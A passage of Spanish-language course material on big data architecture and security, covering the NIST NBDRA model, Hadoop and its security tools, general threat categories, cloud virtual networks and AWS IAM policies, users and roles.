y difiere de los análisis, la inteligencia empresarial, las bases de datos y los sistemas
existentes.
El NBDRA se organiza en torno a dos ejes que representan las dos cadenas de valor del
big data: la información (eje horizontal) y la tecnología de la información (TI; eje vertical).
A lo largo del eje de la información, el valor se crea mediante la recopilación de datos, la
integración, el análisis y la aplicación de los resultados siguiendo la cadena de valor. Por
su lado, a lo largo del eje de la TI, el valor se crea proporcionando redes, infraestructuras,
plataformas, herramientas de aplicación y otros servicios de TI para el alojamiento y el
funcionamiento de los big data en apoyo de las aplicaciones de datos necesarias.
En la intersección de ambos ejes se encuentra el componente de proveedor de aplicaciones

de big data, lo que indica que la analítica de datos y su implementación proporcionan
el valor a los interesados en big data en ambas cadenas de valor. Los nombres de los

componentes Big Data Application Provider y Big Data Framework Provider contienen
«proveedores» para indicar que estos componentes proporcionan o implementan una
función técnica específica dentro del sistema.
Ilustración 36. Modelo big data MBDRA. Fuente: Boyd, Chang y Levin, 2019
Los cinco componentes principales de NBDRA, mostrados en la Figura 2, representan

diferentes funciones técnicas que existen en cada sistema de big data.
SYSTEM ORCHESTRATOR
Define e integra las actividades de aplicación de datos necesarias en el sistema vertical
operacional. En un entorno empresarial, la función de orquestador del sistema suele estar
centralizada y puede asignarse a la función tradicional de gobernador del sistema. Esto
proporciona los requisitos y las restricciones generales que debe cumplir el sistema, como
la política, la arquitectura, los recursos o los requisitos empresariales. El administrador
del sistema trabaja con roles como, por ejemplo, gestor de datos, seguridad de datos y
gestor del sistema para implementar los requisitos y la funcionalidad del sistema.
DATA PROVIDER
Relacionado con la introducción de nuevos datos o fuentes de información en el sistema

de big data, derechos de acceso, transformación de los datos, metadatos, persistencia
de datos, contratos de autorización, etc. El proveedor de datos expone un conjunto de
interfaces (o servicios) para descubrir y acceder a los datos.
Estas interfaces suelen incluir un registro para que las aplicaciones puedan localizar a un
proveedor de datos, identificar los datos de interés que contiene, comprender los tipos de
acceso permitidos, los tipos de análisis admitidos, localizar la fuente de datos, determinar
los métodos de acceso a estos, identificar los requisitos de seguridad de los datos, los
requisitos de privacidad de los datos y otra información pertinente.

Por lo tanto, la interfaz proporcionaría los medios para registrar la fuente de datos,
consultar el registro e identificar un conjunto estándar de datos contenidos en el registro.
BIG DATA APPLICATION PROVIDER

Ejecuta un ciclo de vida de los datos para cumplir con los requisitos de seguridad y
privacidad, así como los requisitos definidos por el orquestador del sistema. El rol del
proveedor de aplicaciones big data ejecuta un conjunto específico de operaciones a lo
largo del ciclo de vida de los datos para cumplir con los requisitos establecidos por el
orquestador del sistema, así como cumplir con los requisitos de seguridad y privacidad. El
proveedor de aplicaciones big data es el componente de la arquitectura que encapsula
la lógica de negocio y la funcionalidad que debe ejecutar la arquitectura. Las actividades
del proveedor de aplicaciones big data incluyen lo siguiente:
• Recogida
• Preparación
• Análisis
• Visualización
• Acceso
El proveedor de aplicaciones de big data puede ser una instancia única o una colección
de proveedores de aplicaciones de big data más granulares, cada uno de los cuales
implementa diferentes pasos en el ciclo de vida de los datos. Todas las actividades
del proveedor de aplicaciones big data pueden ser un servicio general invocado por
el orquestador del sistema, el proveedor de datos o el consumidor de datos, como
un servidor web, un servidor de archivos, una colección de uno o más programas de
aplicación o una combinación.
Puede haber múltiples y diferentes instancias de cada actividad o un solo programa
puede realizar múltiples actividades. Cada una de las actividades puede interactuar
con los proveedores del marco de trabajo de big data subyacentes, así como con los
proveedores y consumidores de datos.
Las actividades pueden ejecutarse en paralelo o en cualquier número de secuencias
y se comunicarán frecuentemente entre sí a través del elemento de mensajería/
comunicaciones del proveedor de la estructura de big data. Además, las funciones del
proveedor de aplicaciones de big data, en concreto las actividades de recogida y acceso,
interactuarán con las capas de seguridad y privacidad para realizar la autenticación/
autorización y registrar/mantener la procedencia de los datos.
BIG DATA FRAMEWORK PROVIDER

Establece un marco en el que ejecutar ciertas aplicaciones de transformación mientras
se protege la privacidad e integridad de los datos. Los tres componentes principales
son: recursos de infraestructura (redes, computación, almacenamiento, infraestructura
física), plataformas de datos (memoria, sistemas de ficheros,) y de procesamiento (batch,
streaming).

DATA CONSUMER
Incluye a los usuarios finales u otros sistemas que utilizan los resultados del Big Data
Aplication provider. Al igual que el proveedor de datos, el papel del consumidor de datos
dentro de NBDRA puede ser un usuario final real u otro sistema. En muchos sentidos, este
papel es la imagen de espejo del proveedor de datos, con todo el marco de Big Data
apareciendo como un proveedor de datos para el consumidor. Las actividades asociadas
al rol de consumidor de datos incluyen las siguientes:
• Buscar y recuperar.
• Descargar.
• Analizar localmente.
• Elaboración de informes.
• Visualización.
• Datos para utilizar en sus propios procesos.
Las dos capas mostradas en la Figura 1, que engloban los cinco componentes funcionales,
son:
1. Management
Al igual que en los sistemas tradicionales, la gestión de sistemas para la arquitectura de
big data implica el aprovisionamiento, la configuración, la gestión de paquetes, la gestión
de software, la gestión de copias de seguridad, la gestión de capacidades, la gestión de
recursos y la gestión del rendimiento de la infraestructura de big data, incluidos los nodos
de computación, los nodos de almacenamiento y los dispositivos de red.
Debido a la naturaleza distribuida y compleja de la infraestructura de big data, la gestión
de su sistema es un reto, especialmente en lo que respecta a la capacidad de controlar,
programar y gestionar los marcos de procesamiento para realizar el procesamiento
analítico escalable, robusto y seguro que requiere el proveedor de aplicaciones de big
data. La infraestructura de big data puede contener dispositivos de almacenamiento SAN
o NAS, espacios de almacenamiento en la nube, bases de datos NoSQL, clusters Map/
Reduce, funciones de análisis de datos, motores de búsqueda e indexación y plataformas
de mensajería.
2. Security and Privacy

El papel de la seguridad y la privacidad se representa correctamente en relación con
los componentes, pero no se amplía a detalles más finos, que pueden ser más precisos
pero que es mejor relegar a una arquitectura de referencia de seguridad y privacidad
más detallada. El proveedor de datos y el consumidor de datos están incluidos en la
copia de seguridad y privacidad, ya que, como mínimo, pueden acordar nominalmente
los protocolos y mecanismos de seguridad. La capa de seguridad y privacidad es una
representación aproximada que alude a la intrincada naturaleza interconectada y a la
ubicuidad de la seguridad y la privacidad en toda la NBDRA.

HADOOP
Según Docsmicrosoft (2022):
«Apache Hadoop es un marco de trabajo que permite el procesamiento distribuido de grandes
conjuntos de datos a través de clusters de computadores utilizando modelos de programación
sencillos. Está diseñado para escalar desde servidores individuales hasta miles de máquinas, cada
una de las cuales ofrece computación y almacenamiento local. En lugar de depender del hardware
para ofrecer una alta disponibilidad, la propia biblioteca está diseñada para detectar y gestionar
los fallos en la capa de la aplicación, ofreciendo así un servicio de alta disponibilidad sobre un
clúster de computadores, cada uno de los cuales puede ser propenso a fallos».
En la figura siguiente se representa un sistema basado en el concepto Hadoop.
Ilustración 37. Arquitectura Hadoop. Fuente: Intelligent Business Strategies, 2016.
Si se efectúa un mapeo con las capas del modelo de referencia del NIST NBDRA, Hadoop
tiene principalmente los siguientes componentes:
• Aplicaciones para el componente de orquestación del sistema: Yarn, Ambari,
Zookeeper, Oozie.
• Aplicaciones para el componente proveedor de datos: HDFS (Hadoop
Distributed File System), Hbase, Flume, Sqoop.
• Aplicaciones para el componente proveedor de aplicaciones: MapReduce,
Mahout, Apache Spark, Apache Kafka.
• Servicios para el componente proveedor de infraestructura: este componente
está representado por la infraestructura interna o por servicios contratados en
la nube. La gestión de estos recursos se lleva a cabo con sus propias interfaces
y procedimientos de acuerdo con la tecnología usada o al servicio contratado
(AWS, Azure, etc).
• Aplicaciones para el componente consumidor de datos: Pig, Hive, Solr,
QlikView.
• Aplicaciones para el componente de seguridad y privacidad: Apache Knox,
Apache, Ranger, Apache Sentri, Rhino.
Como ejemplo práctico de entorno empresarial que usa el framework Apache Hadoop

— puede consultarse en la página de Docsmicrosoft— el producto HSInsight, que incluye
Apache Hadoop, Spark, Hive, Hbase y Kafka, etc., está integrado con Data Factory para
crear procesos ETL (Extract, Transform and Load) y Data Lake Storage que es la solución
de almacenamiento escalable de Microsoft.
Todos estos componentes están integrados en Azure Active Directory. Por otra parte,
HDInsight, ofrece sus servicios de inteligencia artificial y machine learning con Azure AI.
Azure Active Directory, junto con Azure RBAC (Acceso basado en roles) y Azure Key Vault
(Protección de secretos) entre otros aplicativos de Azure como Sentinel, etc., permiten
aportar seguridad y privacidad a la solución.
Según la página de Docsmicrosoft (2022) Azure HDinsight «permite usar el sistema de
archivos distribuido Apache Hadoop (HDFS), la administración de recursos de Apache
Hadoop YARN y un modelo de programación sencillo de MapReduce para procesar y
analizar datos de por lotes en paralelo».
En la Figura 3 se muestran los componentes integrados en Azure HDInsight.
Ilustración 38. Componentes integrados en Azure HDinsight
11.2. Vulnerabilidades y amenazas en big data

ANTECEDENTES
Las amenazas que pueden aprovechar las vulnerabilidades de una arquitectura big data
caen dentro de las categorías estándar de vulnerabilidades en el software, como son Sans
Top 25, Owasp Top Ten, Wasc y, además, las categorías de amenazas más frecuentes y
peligrosas en Sistemas Gestores de Bases de Datos.

El almacenamiento de los datos es un problema de seguridad importante. Las empresas
y organizaciones agregan datos de una amplia gama de repositorios y aplicaciones
para proporcionar más opciones de búsqueda con el fin de aumentar el valor de los
datos. Mediante su recopilación en un almacén de datos, los usuarios van a obtener
información valiosa, pero este almacén también es vulnerable a los ataques.
Una vez que el almacén de datos ha sido atacado, una gran cantidad de datos puede
estar expuesta, incluyendo información confidencial, como: datos personales, cuentas
bancarias, etc. Antes de utilizar big data, todos los datos estaban separados en diferentes
repositorios. Debido a que se tienen que analizar grandes volúmenes de datos, hay que
adicionar y guardar todos ellos en un solo almacén. A pesar de que big data es una
tecnología única en cuanto a su función y método, fundamentalmente, siguen siendo
datos.
Las cuestiones de seguridad y privacidad se ven aumentadas por el volumen, la variedad,
el valor, la veracidad y la velocidad de big data. La diversidad de fuentes de datos,
formatos y flujos de datos, combinada con la naturaleza de la transmisión de datos y el
alto volumen, suponen riesgos de seguridad nuevos.
En resumen:
• Abordamos las implicaciones de seguridad cuando las organizaciones mueven los

datos confidenciales a un repositorio big data.
• Identificamos los diferentes modelos de amenaza y el marco de control de seguridad
para abordar y mitigar los riesgos de seguridad debidos a las amenazas identificadas
y casos de abuso.
El término «big data» hace referencia a cantidades masivas de información digital que
las empresas recogen. Las estimaciones de la industria sobre la tasa de crecimiento de
los datos son aproximadamente el doble cada dos años, de 50 Zettabytes en 2019 a 200
Zettabytes en 2020, según datos de Chojecki (2019). El big data no es una tecnología
específica, es una colección de atributos y capacidades.
La investigación de Lane (2012) añade características adicionales para que un entorno
particular califique como big data:
Tabla 6 Características adicionales para calificar como big data. Fuente: adaptado de Lane, 2012.

No es solo la existencia de grandes cantidades de datos lo que está creando nuevos
retos de seguridad para las organizaciones. Big data ha sido recogida y utilizada por
las empresas durante varias décadas. Las infraestructuras desoftware, como Hadoop,
permiten a los desarrolladores y analistas aprovechar fácilmente cientos de nodos
informáticos para realizar la computación paralela de datos que no existían antes.
Como resultado, han surgido nuevosdesafíos de seguridad del acoplamiento de big
data con composiciones heterogéneas dehardware de productos básicos con sistemas
operativos de productos básicos e infraestructuras de software de productos básicos
para almacenar y computar en datos.
A medida que Big Data se expande en las diferentes empresas, los mecanismos
tradicionales de seguridad diseñados para asegurar los datos estáticos a pequeña
escala y los flujos de datos en las redes de cortafuegos y semiaisladas son inadecuados.
Del mismo modo, no está claro cómo modernizar la procedencia en la infraestructura
existente de una empresa. Las amenazas y vulnerabilidades específicas que expone un
sistema de big data, según Paryasto et al. (2014), son:

Tabla 7 . Amenazas y vulnerabilidades. Fuente: adaptado de Paryasto et al.,2014.
En la Ilustración 210 se observan esquemáticamente, por un lado, las diferencias de un

entorno de big data con otros tipos de sistemas convencionales que emplean bases
de datos relacionales generalmente. Como se puede apreciar, todas las categorías se
pueden enmarcar dentro de las categorías de vulnerabilidades Owasp Top Ten 2017 y
vulnerabilidades más frecuentes y peligrosas en bases de datos.

Ilustración 39 Vulnerabilidades Big Data. Fuente: Paryasto et al., 2014
11.3. Seguridad y privacidad en big data

La seguridad y privacidad de una arquitectura big data se debe abordar, como cualquier
otro tipo de sistema, bajo el ámbito de un sistema de gestión de la seguridad de la
información, la política de seguridad y a los procesos contemplados en ellos, como de
ciclo de vida de desarrollo seguro de sistemas y monitorización continua entre otros. Estos
conceptos se desarrollan en otras asignaturas del máster.

El objetivo es desarrollar las peculiaridades y aspectos específicos de la implementación
de la seguridad de una arquitectura big data.
Los objetivos de estudiar la seguridad y privacidad en big data son los siguientes:
• Se especifican los puntos clave o desafíos más importantes a acometer en lo referente
a seguridad y privacidad en big data, en relación con el Top Ten del Cloud Security
Alliance Big Data Security Working Group.
• Se analiza el modelo de diseño de la seguridad y privacidad del NIST NBDRA.
• Se introduce cómo puede ser el enfoque de diseño e implementación de la seguridad
de un sistema basado en Hadoop.
TOP 10 DESAFÍOS DE SEGURIDAD Y PRIVACIDAD
Cloud Security Alliance Big Data Security Working Group, presenta su Top 10 en seguridad
y privacidad para implementar en big data, lo veremos en la Tabla 2.
Ilustración 40 Top Ten en seguridad y privacidad para implementar en big data. Fuente: adaptado de Cloud Security Alliance, 2012.

Así mismo, Cloud Security Alliance (2013) agrupa los desafíos anteriores en cuatro
categorías:
• Seguridad de Infraestructura.
• Cálculos seguros en frameworks de desarrollo distribuidos.
• Prácticas recomendadas de seguridad para datos no relacionales.
• Privacidad de datos.
• Minería de datos y análisis.
• Cifrado de datos.
• Control de acceso granular.
• Gestión de datos y auditoría.
• Registro seguro de datos y transacciones.
• Auditorías granulares.
• Procedencia de los datos.
• Integridad y seguridad reactiva.
• Validación/filtrado de entrada de punto final.
• Supervisión de seguridad en tiempo real.
Ilustración 41 Top 10 Seguridad Big Data. Fuente: Cloud security alliance, 2013.

Ilustración 42 diseño e implementación de un sistema de big data y su flujo de control. Fuente:
Paryasto et al.,2014.
Los principales documentos que el NIST Big Data Working Group publica en su sitio web
desarrollando los diferentes aspectos de big data incluidos la seguridad y privacidad
son los siguientes:
• Big data definitions.

• Big data taxonomies.
• Big data use cases & requirements.
• Big data security and privacy.
• Big data architecture white paper survey.
• Big data reference architecture.
• Big data standards roadmap.
TAXONOMÍA CONCEPTUAL DE SEGURIDAD Y PRIVACIDAD BIG

DATA
Un esquema de la taxonomía conceptual de seguridad y privacidad se presenta en la

Figura 7 y contiene cuatro aspectos principales según el National Institute of Standars
and Technology (2015):
• Confidencialidad de los datos.
• Procedencia de los datos.

• Gestión y administración del sistema: rendimiento y disponibilidad.
• Política pública, social y aspectos interorganizaciones.
Los tres primeros corresponden en gran medida a la clasificación tradicional de
confidencialidad, integridad y disponibilidad (CIA), reorientado a la computación paralela
de big data.
Ilustración 43 Taxonomía conceptual seguridad big data del NIST. Fuente: National Institute of
Standars and Technology, 2019
CONFIDENCIALIDAD DE LOS DATOS
• Confidencialidad de los datos en tránsito: por ejemplo, aplicada mediante el

uso de TLS (Transport Layer Security).
• Confidencialidad de los datos almacenados. Se establecerán políticas para
acceder a datos basados en credenciales.
• Computación en datos cifrados. Soporte de búsqueda e informes en datos
cifrados.
• Agregación segura de datos: agregación de datos sin comprometer la
privacidad.
• Anonimato de datos: protección de la privacidad.
• Gestión de claves. Seguridad de claves criptográficas en la nube.
• Validación de entrada de punto final: un mecanismo para validar si los datos
de entrada provienen de una fuente autenticada, por ejemplo, firmas digitales.
• Integridad de la comunicación: integridad de los datos en tránsito, aplicada,
por ejemplo, mediante el uso de TLS.
• Cálculos autenticados sobre los datos: asegurar que los cálculos que se

llevan a cabo en fragmentos críticos de datos son ciertamente los cálculos
esperados.
• Auditorías granulares: habilitación de auditoría con alta granularidad.
• Control de activos valiosos.
GESTIÓN Y ADMINISTRACIÓN DEL SISTEMA: RENDIMIENTO Y

DISPONIBILIDAD DEL SISTEMA
• Disponibilidad del sistema. Implementaciones de seguridad contra ataques

de denegación de servicio (DoS).
• Construcción de protocolos criptográficos (desarrollados con cifrado, firmas
y otras primitivas de comprobación de integridad criptográfica) resistentes
proactivamente a DoS.
• Inmunidad al sistema: big data utilizado para análisis de seguridad.
• Análisis de inteligencia de seguridad.
• Detección de abuso dirigido por los datos.
• Análisis de big data en logs, eventos y agentes inteligentes.
• Detección de eventos de violación de la seguridad.
• Análisis forense.
• Apoyo de la resiliencia.
POLÍTICA PÚBLICA, SOCIAL Y ASPECTOS INTERORGANIZACIONES

• Cada uno de estos aspectos tiene dimensiones de seguridad y privacidad
relacionados con big data que podrían afectar la implementación de una
capa adicional en un proyecto de big data específico. Por ejemplo, un proyecto
de dispositivos médicos podría necesitar abordar riesgos para la seguridad
humana, mientras que un proyecto bancario se ocuparía de las diferentes
regulaciones aplicables a big data que cruzan las fronteras:
• Abuso y crimen relacionado con computadoras.
• Sistemas de salud públicos y privados relacionados con la informática.
• Ética (dentro de la ciencia de los datos, pero también entre las profesiones).
• Seguridad humana.
• Derechos de propiedad intelectual y gestión de la información asociada.
• Reglamento.

• Flujos de datos transfronterizos.
• Uso / abuso de poder.
• Tecnologías de asistencia para personas con discapacidades (por ejemplo,
seguridad añadida o diferente, pueden medidas necesarias para distintos
subgrupos dentro de la población).
• Empleo (por ejemplo, las regulaciones aplicables al derecho laboral pueden
regir el uso apropiado de big data producidos o administrados por empleados).
• Aspectos sociales del comercio electrónico.
• Legal: censura, impuestos, cumplimiento de contratos, forenses para la
aplicación de la ley.
TAXONOMÍA OPERATIVA DE SEGURIDAD Y PRIVACIDAD BIG DATA

Las metodologías actuales para asegurar los sistemas de big data son diversas. Emplean
enfoques muy dispares que, a menudo, no forman parte de un marco conceptual unificado.
Los elementos de la taxonomía operacional, mostrados en la Figura 8, representan
agrupaciones de metodologías prácticas. Estos se clasifican como «operacionales»
porque abordan vulnerabilidades específicas o tareas de gestión de riesgos para el
funcionamiento de los sistemas big data.
En este punto del proceso de desarrollo de estándares, estas metodologías no han sido
incorporadas como parte de una capa de seguridad. Son elementos que componen
una lista de verificación que pueden resolver necesidades específicas de seguridad o
privacidad en big data.
Ilustración 44 Taxonomía operativa de seguridad big data del NIST. Fuente: National Institute of Standars and Technology, 2019.

REGISTRO DE DISPOSITIVOS Y APLICACIONES
Registro de dispositivos, usuarios, activos, servicios y aplicaciones. Incluye: registro de

dispositivos en redes M2M (Machine to machine), activos, servicios, aplicaciones y roles
de usuario.
• Modelo de metadatos de seguridad.

• Aplicación de políticas.
• Construcción del entorno
• Implementación de políticas.
• Modelo de gestión de seguridad y privacidad. Taxonomía operativa de gestión
de identidades y gestión de accesos a los datos.
• Auditoría granular de políticas
• Registro del comportamiento específico de cada rol.
GESTIÓN DE IDENTIDAD Y ACCESO
• Gestión de identidades de la capa de virtualización.

• Gestión de identidades de la capa de aplicación.
• Gestión de identidades de la capa de usuario final.
• Proveedor de identidad (IdP): SAML.
• Autorización de acceso a recursos: XACML, basado en políticas de atributos.
GESTIÓN DE DATOS
Sin embargo, los grandes y complejos conjuntos de datos complican la gestión de big
data en términos de volumen de datos, velocidad, variedad y variabilidad. Para estimular
la adaptación a un cambio positivo, la gestión de los datos necesitará persistir a lo
largo del ciclo de vida, de los datos en reposo, en movimiento, en etapas incompletas
y en transacciones, mientras proporciona seguridad y privacidad de jóvenes, ancianos,
organizaciones, etc.
Se tendrán que cultivar los beneficios económicos y la innovación, pero también permitir
la libertad de acción y promover el bienestar individual y público. Tendrá que basarse

en estándares que gobiernan tecnologías y prácticas no comprendidas totalmente al
integrar el elemento humano. La gestión de big data, requerirá nuevas perspectivas
para aceptar la lentitud o ineficacia de algunas técnicas actuales. A continuación, se
enumeran algunas consideraciones sobre la gestión de datos:
• Aplicaciones big data de gestión: el desarrollo de nuevas aplicaciones que
emplean principios de big data y diseñadas para mejorar la gestión pueden
ser algunas de las aplicaciones de big data más útiles en el horizonte.
• Administración de claves de cifrado en memoria, en almacenamiento y en
tránsito.
• Aislamiento.
• Seguridad de almacenamiento.
• Prevención y detección de pérdida de datos.
• Pasarelas para servicios web.
• Transformación de datos.
• Gestión del Ciclo de vida de los datos.
• Validacion endpoint.
• Confianza.
• Ética de la información.
GESTIÓN DE LA INFRAESTRUCTURA
La gestión de la infraestructura implica consideraciones de seguridad y privacidad

relacionadas con la operación y el mantenimiento del hardware. A continuación, se
enumeran algunos temas relacionados con la gestión de infraestructuras.
• Gestión de amenazas y vulnerabilidades.
• Supervisión y alerta.
• Mitigación de eventos de seguridad.
• Gestión de la configuración.
• Logging.
• Vigilancia y remediación de malware.
• Control del perímetro de red.
• Resiliencia, redundancia y recuperación.
• Redundancia.

REGISTRO Y GESTIÓN DEL RIESGO
El riesgo y registro abarcan los siguientes aspectos:
• Registro. Se pueden lograr el registro de información, procesos y roles a través
de varios medios, como portales de transparencia y puntos de inspección,
inspección de procedencia directa e inversa.
• Cumplimiento. El cumplimiento en big data abarca múltiples aspectos de la
taxonomía de seguridad y privacidad, reportes y leyes específicas de cada
nación.
• Análisis forense. Técnicas forenses en big data que se utilizan en escenarios
de fallas de seguridad de big data.
• Nivel de riesgo del negocio. El análisis de riesgos de big data, debe ser asignado
a cada elemento de la taxonomía. Los modelos de riesgo empresarial pueden
y deben incorporar consideraciones de privacidad.
SEGURIDAD Y PRIVACIDAD EN HADOOP

Varias de las herramientas disponibles para implementar la seguridad y la privacidad en
un sistema basado en Hadoop se relacionan en la Tabla 3:
Ilustración 45 Herramientas disponibles para implementar la seguridad y la privacidad en un sistema basado en Hadoop. Fuente: elaboración
propia.
• Apache Knox: consiste en un REST API Gateway para interactuar con los
clústeres de Hadoop. Proporciona un solo punto de acceso para todas las
interacciones REST con clústeres Hadoop. Además, facilita la funcionalidad
de control, integración, monitorización y automatización de las necesidades
críticas y analíticas de la empresa. Proporciona funciones de autenticación,
autorización y auditoría.
• Sentry: es otra herramienta de seguridad para Hadoop y proporciona

autorización para datos almacenados en Hadoop. Tiene un módulo de seguridad
independiente que se integra con los motores de consulta SQL de código
abierto, Hive y Cloudera Impala. Ofrece controles avanzados de autorización
para permitir aplicaciones multiusuario y procesos interfuncionales para
conjuntos de datos empresariales.
• Apache Ranger: ofrece un marco de seguridad centralizado para gestionar
el control de acceso sobre componentes de Hadoop de acceso a datos
como Hive y HBase. Mediante la consola de Ranger, los administradores de
seguridad pueden manejar fácilmente las políticas de seguridad para acceso
a los archivos, carpetas, bases de datos, tablas o columnas. Estas se pueden
configurar para usuarios individuales o grupos y luego se aplican dentro de
Hadoop.
• Proyecto Rhino: sirve a Hadoop como una solución completa que también
soporta herramientas como ZooKeeper, Hive, Oozie etc., aportando la seguridad
de todos ellos. Algunos de los beneficios de Rhino es que añade soporte
de encriptación y gestión de claves, crea un marco común de autorización
de Hadoop, inicia una única sesión, con autenticación basada en el token y
extiende el soporte de HBase para implementar listas de control de acceso
(ACL) de forma más granular. Además, mejora el registro de auditoría.
11.4. Redes Virtuales

Las redes virtuales en la nube permiten que muchos tipos de recursos, como las
máquinas virtuales, se comuniquen de manera segura entre sí, con Internet y con las
redes locales on-premise. Son similares a la red tradicional de un centro de datos, pero
tienen beneficios adicionales de la infraestructura nativa de nube, como la escalabilidad
y alta disponibilidad.
Los servicios de red virtuales son la base para construirsoluciones de nube nativas e
híbridas, permitiendo conectar, de forma segura, los recursos nativos y la infraestructura
de nube a los centros de datos físicos.
Los elementos principales son:
• Espacio de direcciones: al crear una red virtual, es necesario especificar un

espacio de direcciones IP privadas.
• Subredes: las subredes permiten segmentar la red virtual en una o más
redes, y asignar una parte del espacio de direcciones de la red virtual a cada
subred. Los recursos podrán desplegarse en la subred necesaria, de acuerdo
con las necesidades de la arquitectura de los sistemas. Al igual que en una
red tradicional, la segmentación de las subredes mejora la eficiencia de
asignación de direcciones. Además, los recursos dentro de las subredes se
pueden proteger utilizando grupos de seguridad de red.
• Regiones: una región es un conjunto de centros de datos, implementados
dentro de un perímetro con una latencia definida y conectados a través de
una red regional dedicada de baja latencia. Aunque las redes virtuales tienen

un alcance para una sola región, se pueden conectar varias redes virtuales
de diferentes regiones mediante el emparejamiento de redes virtuales.
• Suscripción: las redes virtuales están asociadas a una cuenta, pero en
una cuenta se pueden definir tantas redes virtuales como se necesite.
Una vez tenemos nuestra red virtual, se nos presentan diferentes escenarios
de interconexión:
• Conexión con Internet: de manera predeterminada, todos los recursos en
una red virtual pueden iniciar comunicación saliente hacia Internet. En sentido
contrario, sin embargo, los recursos son accesibles desde Internet si se les
asigna una dirección IP pública, o un balanceador de carga, y el tráfico está
permitido con un grupo de seguridad de red.
• Conexión con otros recursos en la nube: se conectan entre sí a través de la
red virtual o, si estuviesen situados en diferentes redes virtuales, mediante el
emparejamiento de estas.
• Conexión con recursos locales: los recursos locales y las redes virtuales en la
nube se pueden conectar a través de una VPN.
11.5. Identity and Access Management

IAM permite administrar quién puede acceder a los recursos y qué acciones puede
ejecutar. Tener una política de IAM bien planificada es una parte importante de la
seguridad. IAM distingue entre autenticación, que está basada en usuarios y grupos; y
autorización, que se basa en políticas.
Los proveedores en la nube integran en sus plataformas IAM para controlar el acceso a
los diferentes recursos. A continuación, vamos a ver la forma en la que IAM es gestionado
dentro de AWS.
IAM EN AWS
En esta sección vamos a analizar cada uno de los componentes utilizados para el
despliegue de una solución IAM en AWS.
ARN
Para identificar los recursos, entre ellos a los usuarios de IAM, AWS usa los Amazon
Resource Names. Un ARN es un identificador único global que hace referencia a objetos
de AWS. La mayoría de los tipos de recursos de AWS tienen ARN, incluidos los objetos de
S3 y los roles, usuarios y directivas de IAM. Tienen el siguiente formato:
arn:partition:service:region:account-id:resource-type/resource-id donde:
• partition: una partición es un grupo de regiones de AWS: aws, aws-cn (regiones
de China), aws-us-gov (regiones GovCloud de EE. UU.). Una cuenta en AWS
pertenece a una única partición.

• service: identifica el tipo de servicio de AWS que ofrece el recurso: s3, iam,
ece2, etc.
• region: identifica la región en la que está ubicado el recurso. Este campo no
es necesario si se trata de un recurso definido de manera global.
• account-id: el ID de la cuenta propietaria del recurso. Es omitido para algunos
recursos globales.
• resource-id: el identificador del recurso, que puede ser un identificador o una
ruta.
DIRECTIVAS DE IAM
La idea detrás de IAM es separar a los usuarios y grupos de las acciones que necesitan
realizar. Para ello, se crean directivas de IAM, que son documentos JSON que describen
qué acciones puede realizar un usuario. Esta política se aplica a los usuarios o grupos,
dándoles acceso solo a los servicios que especifica el documento.
Un permiso es una combinación de dos elementos: una acción y una lista de recursos.
AWS verificará si el usuario autenticado puede realizar la acción solicitada en un recurso
específico. Las acciones se definen como cadenas de texto con el formato servicio:permiso.
Los elementos que utilizamos para definir una directiva son:
• Los statements o declaraciones: la declaración es la pieza elemental de una
directiva, ya que enlaza acciones y recursos. El campo statement es realmente
una lista de subdocumentos, por lo que una única directiva puede tener
varias declaraciones.
• El campo effect indica si se habilitan las acciones sobre los recursos, con
Allow, o si se deniegan explícitamente, con Deny. Por defecto, un usuario al que
no se le aplica ninguna directiva no tendrá permiso para ejecutar ninguna
acción sobre ningún recurso. El valor Deny en effect sirve, por tanto, para
denegar permisos específicos que pueden haber sido habilitados por otra
directiva.
• El campo action especifica las acciones permitidas o denegadas sobre los
recursos. Puede ser un campo de texto, en cuyo caso, especifica una única
acción, o una lista. Las acciones admiten comodines en el permiso para reducir
el número de permisos que hay que escribir para conseguir un determinado
acceso. Por ejemplo, una directiva puede dar acceso completo al servicio EC2
con la acción ec2:*, que, de no usar un comodín, habría que escribir los más
de cuatrocientos permisos disponibles.
• El campo resource especifica el recurso o recursos, identificados con ARN,
sobre los que hace efecto la declaración. Al igual que action, puede ser un
campo de texto o una lista.
A continuación, se muestra un ejemplo de directiva.
{“Version”: “2012-10-17”, “Statement”: [{ “Sid”: “VisualEditor0”, “Effect”: “Allow”, “Action”: [
“ec2:RebootInstances”, “ec2:DescribeInstances” ], “Resource”: “*” }] }

USUARIOS Y GRUPOS
Un usuario puede ser un humano que inicia sesión en la consola de administración
web, con un nombre de usuario y contraseña, o un programa que utiliza un conjunto
de credenciales de acceso para interactuar con las API de AWS. Al usuario se le pueden
asignar una o más directivas de IAM, que especificarán las acciones que puede realizar.
Al crear un usuario, hay que especificar si podrá iniciar sesión en la consola, o si podrá
acceder a las API directamente con un SDK, o la herramienta de línea de comandos.
El acceso a las API se realiza con una clave y un secreto adicionales, aleatorios y más
complejos que un nombre de usuario y una contraseña normales. Cada usuario puede
tener dos claves activas. El objetivo de estas claves es usarlas en cuentas de servicio,
tareas automáticas, etc.
Dado que estas cuentas no pueden cambiar la contraseña por sí mismas, es necesario
disponer de, al menos, dos claves para poder rotarlas. La rotación de claves era un
proceso complicado que se vio aligerado con la aparición de los roles en 2012.
ROLES
Al igual que los usuarios y grupos, los roles de IAM pueden tener una o más directivas
aplicadas. Estos roles se aplican, entonces, a una instancia en el momento del arranque.
AWS generará automáticamente la clave y el secreto de acceso, y los pondrá a disposición
de la instancia a través de la API de metadatos.
Estas credenciales se pueden usar para acceder a los servicios de AWS con los permisos
especificados por las políticas del rol. Los SDK de AWS y awscli están preparados para
leer estas claves automáticamente, sin necesidad de que los desarrolladores ni los
administradores se tengan que encargar de indicar configuración alguna. El único
requisito es que la aplicación debe ejecutarse en una instancia de EC2. Además, AWS
rotará regularmente las claves durante la vida útil de la instancia, sin requerir ninguna
acción por parte de los administradores.
Los roles se pueden aplicar también a otros servicios de AWS como Lambda o API
Gateway, usuarios (dentro y fuera de una organización), aplicaciones móviles o a terceras
entidades, para permitir que un proveedor administre ciertos recursos en la cuenta del
cliente.
El uso de roles para dar permisos en otras cuentas ofrece más flexibilidad para administrar
recursos, presupuestos y credenciales. Es habitual que las organizaciones dispongan
de múltiples cuentas de AWS para identificar, claramente, los límites de gasto. En estas
situaciones no es viable mantener usuarios y sus credenciales en todas las cuentas.
Para ello, se pueden asignar roles de una cuenta (A) a usuarios de otra cuenta (B).
Cuando un usuario de la cuenta B quiere operar sobre recursos de la cuenta A, el usuario
asume un rol de la cuenta B. Las acciones que puede llevar a cabo están delimitadas por
las directivas aplicadas a ese rol, no a las aplicadas al usuario. Esto es especialmente
